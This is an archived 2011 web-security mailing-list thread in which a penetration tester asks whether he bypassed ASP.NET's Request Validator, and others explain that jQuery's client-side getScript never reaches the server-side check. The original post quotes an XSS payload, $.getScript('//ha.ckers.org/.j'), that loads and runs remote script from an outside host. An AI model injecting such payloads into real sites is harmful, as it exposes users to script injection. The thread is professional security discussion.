[WEB SECURITY] ASP.NET Request Validator Bypass?

Tasos Laskos tasos.laskos at gmail.com
Sat Feb 19 18:39:06 EST 2011


Gotta love this sort of thing though right?
As websites keep using and building upon these types of libs at some 
point we'll start to figure out the equivalent of "return to libc"-ish 
attacks for web apps.

- Tasos

On 02/19/2011 09:52 PM, Arian J. Evans wrote:
> Exactly. ASP.NET requestValidators are a server-side control.
>
> jquery getScript is designed to be used client-side and fetch a script
> to build or interface with the DOM. Therefore the server side controls
> would never see it.
>
> ---
> Arian Evans
>
>
>
> On Sat, Feb 19, 2011 at 10:04 AM, steve jensen<sjensen1207 at hotmail.com>  wrote:
>> If this jQuery .getScript request is only performed client-side, then it
>> wouldn't even be sent to the server-side ASP.NET XSS validation to be
>> bypassed.
>>
>> ________________________________
>> Date: Sat, 19 Feb 2011 15:39:06 +0000
>> From: ryandewhurst at gmail.com
>> To: websecurity at webappsec.org
>> Subject: [WEB SECURITY] ASP.NET Request Validator Bypass?
>>
>> Hi,
>>
>> Recently on a client test I was able to bypass the ASP.NET Request Validator
>> by leveraging the jQuery library which was included in the page. I am mainly
>> a LAMP guy and my knowledge of ASP.NET and how to set it up is minimal.
>>
>> I was wondering if any one could confirm whether my bypass affects all
>> ASP.NET installations or whether or not this particular client had it
>> configured incorrectly.
>>
>> I used the following jQuery function to bypass the filter:
>> $.getScript('//ha.ckers.org/.j');
>>
>> Thanks,
>> Ryan
>>
>> Ryan Dewhurst
>>
>> blog www.ethicalhack3r.co.uk
>> projects www.dvwa.co.uk | www.webwordcount.com
>> twitter www.twitter.com/ethicalhack3r
>>
>> _______________________________________________ The Web Security Mailing
>> List WebSecurity RSS Feed http://www.webappsec.org/rss/websecurity.rss Join
>> WASC on LinkedIn http://www.linkedin.com/e/gis/83336/4B20E4374DBA WASC on
>> Twitter http://twitter.com/wascupdates websecurity at lists.webappsec.org
>> http://lists.webappsec.org/mailman/listinfo/websecurity_lists.webappsec.org
>> _______________________________________________
>> The Web Security Mailing List
>>
>> WebSecurity RSS Feed
>> http://www.webappsec.org/rss/websecurity.rss
>>
>> Join WASC on LinkedIn http://www.linkedin.com/e/gis/83336/4B20E4374DBA
>>
>> WASC on Twitter
>> http://twitter.com/wascupdates
>>
>> websecurity at lists.webappsec.org
>> http://lists.webappsec.org/mailman/listinfo/websecurity_lists.webappsec.org
>>
>>
>
> _______________________________________________
> The Web Security Mailing List
>
> WebSecurity RSS Feed
> http://www.webappsec.org/rss/websecurity.rss
>
> Join WASC on LinkedIn http://www.linkedin.com/e/gis/83336/4B20E4374DBA
>
> WASC on Twitter
> http://twitter.com/wascupdates
>
> websecurity at lists.webappsec.org
> http://lists.webappsec.org/mailman/listinfo/websecurity_lists.webappsec.org
>





More information about the websecurity mailing list